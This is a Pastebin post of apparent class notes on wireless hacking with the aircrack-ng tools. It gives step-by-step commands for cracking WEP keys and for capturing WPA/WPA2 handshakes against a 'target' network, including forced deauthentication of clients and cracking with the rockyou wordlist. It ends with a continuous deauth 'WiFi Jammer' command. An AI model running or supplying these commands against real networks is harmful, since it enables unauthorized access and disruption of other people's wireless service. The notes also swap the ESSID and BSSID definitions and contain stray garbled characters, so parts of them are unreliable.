API tools faq
paste
Mukezh

Session Wireless Hacking

Mukezh
Apr 1st, 2019
54
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.46 KB | None | 0 0
raw download clone embed print report
  1. ===================
  2. CAPTURING WIRELESS COMMUNICATION PACKETS
  3. ==========================================
  4.  
  5. Attacker’s Machine - Kali OS
  6. Device Used - Leoxsys External WIFI Adapter (LEO-HG150N)
  7. Tool - Airmon-ng , Airodump-ng (Non-Graphical)
  8.  
  9.  
  10. Modes of Using a Wireless Adapter :
  11.  
  12. # Standard Mode : The mode which basically used by everyone to manage and use the services of a particular Access Point.
  13. # Monitoring Mode : The mode which allows a system with a wireless network interface controller to monitor all traffic received from the wireless network.
  14.  
  15. Command: iwconfig --> to check which mode that wifi adapter is working on
  16.  
  17.  
  18. Tools we will be encountering are :
  19.  
  20. * Airmon-ng : A tool which converts our wireless card into a promiscuous mode wireless card. Yes, that means that our wireless card will hookup with anyone !
  21. Well, that's almost correct. When our network card is in promiscuous mode, it means that it can ggtyttttttyyygsee and receive all network traffic. Generally, network cards will only receive packets intended for them (as determined by the MAC address of the NIC), but with airmon-ng, it will receive all wireless traffic intended for us or not.
  22.  
  23. Commands:
  24. # iwconfig
  25. # airmon-ng start wlan0
  26. # kill PID (those which might create problem)
  27.  
  28.  
  29. * Airodump-ng : A tool which enables us to capture packets of our specification.This will show us some more information about a perticular wireless network. So lets discuss with some of the keywords.
  30.  
  31. Commands:
  32. # airodump-ng wlan0mon
  33. #
  34.  
  35.  
  36. Terminologies
  37. ==============
  38. Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
  39.  
  40. #Data : Number of captured data packets, including data broadcast packets.
  41.  
  42. #s : Number of data packets per second measure over the last 10 seconds.
  43.  
  44. CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
  45.  
  46. MB : Maximum speed supported by the AP.
  47.  
  48. ENC : Encryption algorithm in use. OPN = no encryption,"WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
  49.  
  50. CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.
  51.  
  52. AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).
  53.  
  54. WPS : This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates version supported.
  55.  
  56. ESSID : THe MAC / Physical Address of the Access Point.
  57.  
  58. BSSID : Name of the Access Point.
  59.  
  60. WEP
  61. ===
  62. #iwconfig
  63. #airmon-ng
  64. #airmon-ng start wlan0
  65. #iwconfig
  66. #airodump-ng wlan0mon
  67. bssid channel number
  68. #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
  69. Wait until the beacons number reaches to 25,000
  70. #aircrack-ng aranjit-01.cap
  71.  
  72. WPA|WPA2
  73. ========
  74. When there is a new device connecting
  75. -------------------------------------
  76. #iwconfig
  77. #airmon-ng
  78. #airmon-ng start wlan0
  79. #iwconfig
  80. #airodump-ng wlan0mon
  81. bssid channel number
  82. #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
  83. It will help you to get the WPA handshake
  84. #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
  85.  
  86.  
  87. When there is no new device connecting
  88. -------------------------------------
  89. #iwconfig
  90. #airmon-ng
  91. #airmon-ng start wlan0
  92. #iwconfig
  93. #airodump-ng wlan0mon
  94. bssid channel number
  95. #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
  96. It will help you to get the WPA handshake
  97. #aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
  98. This will make us capture the handshake
  99. #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
  100.  
  101. WiFi Jammer
  102. ===========
  103. #aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!